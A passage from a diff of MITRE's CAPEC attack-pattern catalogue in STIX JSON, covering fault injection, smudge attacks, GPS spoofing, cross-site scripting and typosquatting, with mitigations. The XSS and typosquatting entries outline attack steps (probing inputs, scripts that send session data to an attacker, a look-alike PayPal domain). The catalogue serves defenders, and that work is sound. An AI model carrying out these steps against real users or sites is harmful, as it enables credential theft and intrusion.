], + "x_capec_prerequisites": [ + "Physical access to the system", + "The adversary must be cognizant of where fault injection vulnerabilities exist in the system in order to leverage them for exploitation." + ], + "x_capec_resources_required": [ + "\n The relevant sensors and tools to detect and analyze fault/side-channel data from a system.\n A tool capable of injecting fault/side-channel data into a system or application.\n " + ], + "x_capec_skills_required": { + "High": "Adversaries require non-trivial technical skills to create and implement fault injection attacks. Although this style of attack has become easier (commercial equipment and training classes are available to perform these attacks), they usual require significant setup and experimentation time during which physical access to the device is required." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement robust physical security countermeasures and monitoring.", + "id": "course-of-action--f6d53020-4245-4f4d-848b-e5ddf8d7db8e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-624-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--92d3b28d-cca3-4d44-82ca-d1fce4083918", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f6d53020-4245-4f4d-848b-e5ddf8d7db8e", + "spec_version": "2.1", + "target_ref": "attack-pattern--965d88fd-a632-4960-b4ba-7521878a0ba3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Fault injection attacks against mobile devices use disruptive signals or events (e.g. electromagnetic pulses, laser pulses, clock glitches, etc.) to cause faulty behavior. When performed in a controlled manner on devices performing cryptographic operations, this faulty behavior can be exploited to derive secret key information. Although this attack usually requires physical control of the mobile device, it is non-destructive, and the device can be used after the attack without any indication that secret keys were compromised.", + "external_references": [ + { + "external_id": "CAPEC-625", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/625.html" + }, + { + "external_id": "CWE-1247", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1247.html" + }, + { + "external_id": "CWE-1248", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1248.html" + }, + { + "external_id": "CWE-1256", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1256.html" + }, + { + "external_id": "CWE-1319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1319.html" + }, + { + "external_id": "CWE-1332", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1332.html" + }, + { + "external_id": "CWE-1334", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1334.html" + }, + { + "external_id": "CWE-1338", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1338.html" + }, + { + "external_id": "CWE-1351", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1351.html" + } + ], + "id": "attack-pattern--48ba5f20-2888-4a0c-8cc6-28631533f255", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Mobile Device Fault Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--965d88fd-a632-4960-b4ba-7521878a0ba3" + ], + "x_capec_consequences": { + "Access_Control": [ + "Read Data (Extract long-term secret keys (e.g. keys used for VPN or WiFi authentication and encryption) to enable decryption of intercepted VOIP traffic.)" + ], + "Confidentiality": [ + "Read Data (Extract long-term secret keys (e.g. keys used for VPN or WiFi authentication and encryption) to enable decryption of intercepted VOIP traffic.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Hardware" + ], + "x_capec_skills_required": { + "High": "Adversaries require non-trivial technical skills to create and implement fault injection attacks on mobile devices. Although this style of attack has become easier (commercial equipment and training classes are available to perform these attacks), they usual require significant setup and experimentation time during which physical access to the device is required. This prerequisite makes the attack challenging to perform (assuming that physical security countermeasures and monitoring are in place)." + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--224113f1-e834-46f3-9de8-b99b4daabd5a", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd", + "spec_version": "2.1", + "target_ref": "attack-pattern--48ba5f20-2888-4a0c-8cc6-28631533f255", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Frequent changes to secret keys and certificates.", + "id": "course-of-action--b219b8f8-c28d-470b-8031-48f247b21a37", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-625-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--11480983-629b-48d4-bb0d-9b7bede4d597", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b219b8f8-c28d-470b-8031-48f247b21a37", + "spec_version": "2.1", + "target_ref": "attack-pattern--48ba5f20-2888-4a0c-8cc6-28631533f255", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Attacks that reveal the password/passcode pattern on a touchscreen device by detecting oil smudges left behind by the user’s fingers.", + "external_references": [ + { + "external_id": "CAPEC-626", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/626.html" + } + ], + "id": "attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Smudge Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_prerequisites": [ + "The attacker must have physical access to the device." + ], + "x_capec_skills_required": { + "Medium": "The attacker must know how to make use of these smudges." + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong physical security of the device.", + "id": "course-of-action--03c24d78-8f14-4663-b2ab-fdbbdac190bb", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-626-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1f1608da-3175-4247-965b-9dee8d21b05f", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03c24d78-8f14-4663-b2ab-fdbbdac190bb", + "spec_version": "2.1", + "target_ref": "attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary attempts to deceive a GPS receiver by broadcasting counterfeit GPS signals, structured to resemble a set of normal GPS signals. These spoofed signals may be structured in such a way as to cause the receiver to estimate its position to be somewhere other than where it actually is, or to be located where it is but at a different time, as determined by the adversary.", + "external_references": [ + { + "external_id": "CAPEC-627", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/627.html" + } + ], + "id": "attack-pattern--2e1be870-6442-4978-9a30-46d518aa1f74", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Counterfeit GPS Signals", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b" + ], + "x_capec_consequences": { + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--3b7a108f-f42f-42c7-99be-a16ec15ca0ff" + ], + "x_capec_prerequisites": [ + "The target must be relying on valid GPS signal to perform critical operations." + ], + "x_capec_resources_required": [ + "Ability to create spoofed GPS signals." + ], + "x_capec_skills_required": { + "High": "The ability to spoof GPS signals is not trival." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "A common form of a GPS spoofing attack, commonly termed a carry-off attack begins with an adversary broadcasting signals synchronized with the genuine signals observed by the target receiver. The power of the counterfeit signals is then gradually increased and drawn away from the genuine signals. Over time, the adversary can carry the target away from their intended destination and toward a location chosen by the adversary.", + "external_references": [ + { + "external_id": "CAPEC-628", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/628.html" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-489", + "source_name": "reference_from_CAPEC", + "url": "https://en.wikipedia.org/wiki/Spoofing_attack#GPS_Spoofing" + } + ], + "id": "attack-pattern--3b7a108f-f42f-42c7-99be-a16ec15ca0ff", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Carry-Off GPS Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--2e1be870-6442-4978-9a30-46d518aa1f74" + ], + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "A \"proof-of-concept\" attack was successfully performed in June, 2013, when the luxury yacht \"White Rose\" was misdirected with spoofed GPS signals from Monaco to the island of Rhodes by a group of aerospace engineering students from the Cockrell School of Engineering at the University of Texas in Austin. The students were aboard the yacht, allowing their spoofing equipment to gradually overpower the signal strengths of the actual GPS constellation satellites, altering the course of the yacht." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target must be relying on valid GPS signal to perform critical operations." + ], + "x_capec_skills_required": { + "High": "This attack requires advanced knoweldge in GPS technology." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "external_id": "CAPEC-629", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/629.html" + } + ], + "id": "attack-pattern--61baa525-b9a3-4474-98d9-7645906e4cc3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "DEPRECATED: Unauthorized Use of Device Resources", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary embeds malicious scripts in content that will be served to web browsers. The goal of the attack is for the target software, the client-side browser, to execute the script with the users' privilege level. An attack of this type exploits a programs' vulnerabilities that are brought on by allowing remote hosts to execute code and scripts. Web browsers, for example, have some simple security controls in place, but if a remote attacker is allowed to execute scripts (through injecting them in to user-generated content like bulletin boards) then these controls may be bypassed. Further, these attacks are very difficult for an end user to detect.", + "external_references": [ + { + "external_id": "CAPEC-63", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/63.html" + }, + { + "external_id": "CWE-79", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "Cross-Site Scripting", + "external_id": "08", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Cross-Site-Scripting" + }, + { + "description": "Cross Site Scripting (XSS)", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/xss" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cross-Site Scripting (XSS)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--8bd0c718-f126-4397-9754-c5225da7b696", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--f14acee3-770c-4154-a9b2-9eda908c6a9f" + ], + "x_capec_child_of_refs": [ + "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Classic phishing attacks lure users to click on content that appears trustworthy, such as logos, and links that seem to go to their trusted financial institutions and online auction sites. But instead the attacker appends malicious scripts into the otherwise innocent appearing resources. The HTML source for a standard phishing attack looks like this:\n maliciousscript\">Trusted Site\n When the user clicks the link, the appended script also executes on the local user's machine.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe identified potential entry points for XSS vulnerability: The attacker uses the entry points gathered in the \"Explore\" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.

    2. Techniques
    Use a list of XSS probe strings to inject script in parameters of known URLs. If possible, the probe strings contain a unique identifier.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.
    Use a list of XSS probe strings to inject script into UI entry fields. If possible, the probe strings contain a unique identifier.
    Use a list of XSS probe strings to inject script into resources accessed by the application. If possible, the probe strings contain a unique identifier.

Exploit

  1. Steal session IDs, credentials, page content, etc.: As the attacker succeeds in exploiting the vulnerability, they can choose to steal user's credentials in order to reuse or to analyze them later on.

    2. Techniques
    Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and sends document information to the attacker.
    Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute appropriately.

  2. Forceful browsing: When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user's current network (Internet or not).

    3. Techniques
    Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and performs actions on the same web site
    Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities).

  3. Content spoofing: By manipulating the content, the attacker targets the information that the user would like to get from the website.

    4. Techniques
    Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and exposes attacker-modified invalid information to the user on the current web page.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b", + "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f" + ], + "x_capec_prerequisites": [ + "Target client software must be a client that allows scripting communication from remote hosts, such as a JavaScript-enabled Web Browser." + ], + "x_capec_resources_required": [ + "Ability to deploy a custom hostile service for access by targeted clients. Ability to communicate synchronously or asynchronously with client machine." + ], + "x_capec_skills_required": { + "High": "Exploiting a client side vulnerability to inject malicious scripts into the browser's executable process.", + "Low": "To achieve a redirection and use of less trusted source, an attacker can simply place a script in bulletin board, blog, wiki, or other user-generated content site that are echoed back to other client machines." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b2e5df5-9856-4289-90c4-ecaa908f4206", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "spec_version": "2.1", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9acc276d-8c69-42b8-af78-29193fa00cba", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191", + "spec_version": "2.1", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2f74ac5d-bb0a-4f7e-9601-cfc8bac01201", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--97eb8eeb-5e17-4a04-803b-c4de40723fc9", + "spec_version": "2.1", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dabf76e9-8f71-45cd-a775-c1d8040bd5a8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "spec_version": "2.1", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--950d64aa-75ae-40ab-993f-9a539cc6ce36", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "spec_version": "2.1", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e7f5d816-04cc-4ad5-823a-b420121bb86e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "spec_version": "2.1", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c6e23539-a2eb-4b8f-a47e-aac60fb3f876", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--86dea14b-a9d1-461f-a1e0-ff289490c27e", + "spec_version": "2.1", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f6b510bd-d7a8-4d02-aef8-cdfb98c31f65", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "spec_version": "2.1", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary registers a domain name with at least one character different than a trusted domain. A TypoSquatting attack takes advantage of instances where a user mistypes a URL (e.g. www.goggle.com) or not does visually verify a URL before clicking on it (e.g. phishing attack). As a result, the user is directed to an adversary-controlled destination. TypoSquatting does not require an attack against the trusted domain or complicated reverse engineering.", + "external_references": [ + { + "external_id": "CAPEC-630", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/630.html" + }, + { + "description": "Nick Nikiforakis, Marco Balduzzi, Lieven Desmet, Frank Piessens, Wouter Joosen, Soundsquatting: Uncovering the Use of Homophones in Domain Squatting, Trend Micro", + "external_id": "REF-491", + "source_name": "reference_from_CAPEC", + "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-soundsquatting.pdf" + } + ], + "id": "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "modified": "2022-09-29T00:00:00.000Z", + "name": "TypoSquatting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Other": [ + "Other (Depending on the intention of the adversary, a successful TypoSquatting attack can be leveraged to execute more complex attacks such as cross-site scripting or stealing account credentials.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "\n An adversary sends an email, impersonating paypal.com, to a user stating that they have just received a money transfer and to click the given link to obtain their money.\n However, the link the in email is paypa1.com instead of paypal.com, which the user clicks without fully reading the link.\n The user is directed to the adversary's website, which appears as if it is the legitimate paypal.com login page.\n The user thinks they are logging into their account, but have actually just given their paypal credentials to the adversary. The adversary can now use the user's legitimate paypal credentials to log into the user's account and steal any money which may be in the account.\n TypoSquatting vulnerability allows an adversary to impersonate a trusted domain and trick a user into visiting the malicious website to steal user credentials.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target website: The adversary first determines which website to impersonate, generally one that is trusted and receives a consistent amount of traffic.

    2. Techniques
    Research popular or high traffic websites.

Experiment

  1. Impersonate trusted domain: In order to impersonate the trusted domain, the adversary needs to register the TypoSquatted URL.

    2. Techniques
    Register the TypoSquatted domain.

Exploit

  1. Deceive user into visiting domain: Finally, the adversary needs to deceive a user into visiting the TypoSquatted domain.

    2. Techniques
    Execute a phishing attack and send a user an e-mail convincing the user to click on a link leading the user to the TypoSquatted domain.
    Assume that a user will incorrectly type the legitimate URL, leading the user to the TypoSquatted domain.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be able to register DNS hostnames/URL’s." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0098fae5-dbdf-44cd-a5c0-b5fc9efe3a56", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0348be-410d-4fe9-bf0e-bb5e48d5af8b", + "spec_version": "2.1", + "target_ref": "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Purchase potential TypoSquatted domains and forward to legitimate domain.", + "id": "course-of-action--57146b6f-bca0-47d6-9268-5475bdf66db1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-630-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c2442a11-1be7-42c6-b9e8-d6e757681156", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--57146b6f-bca0-47d6-9268-5475bdf66db1", + "spec_version": "2.1", + "target_ref": "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary registers a domain name that sounds the same as a trusted domain, but has a different spelling. A SoundSquatting attack takes advantage of a user's confusion of the two words to direct Internet traffic to adversary-controlled destinations. SoundSquatting does not require an attack against the trusted domain or complicated reverse engineering.", + "external_references": [ + { + "external_id": "CAPEC-631", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/631.html" + }, + { + "description": "Nick Nikiforakis, Marco Balduzzi, Lieven Desmet, Frank Piessens, Wouter Joosen, Soundsquatting: Uncovering the Use of Homophones in Domain Squatting, Trend Micro", + "external_id": "REF-491", + "source_name": "reference_from_CAPEC", + "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-soundsquatting.pdf" + } + ], + "id": 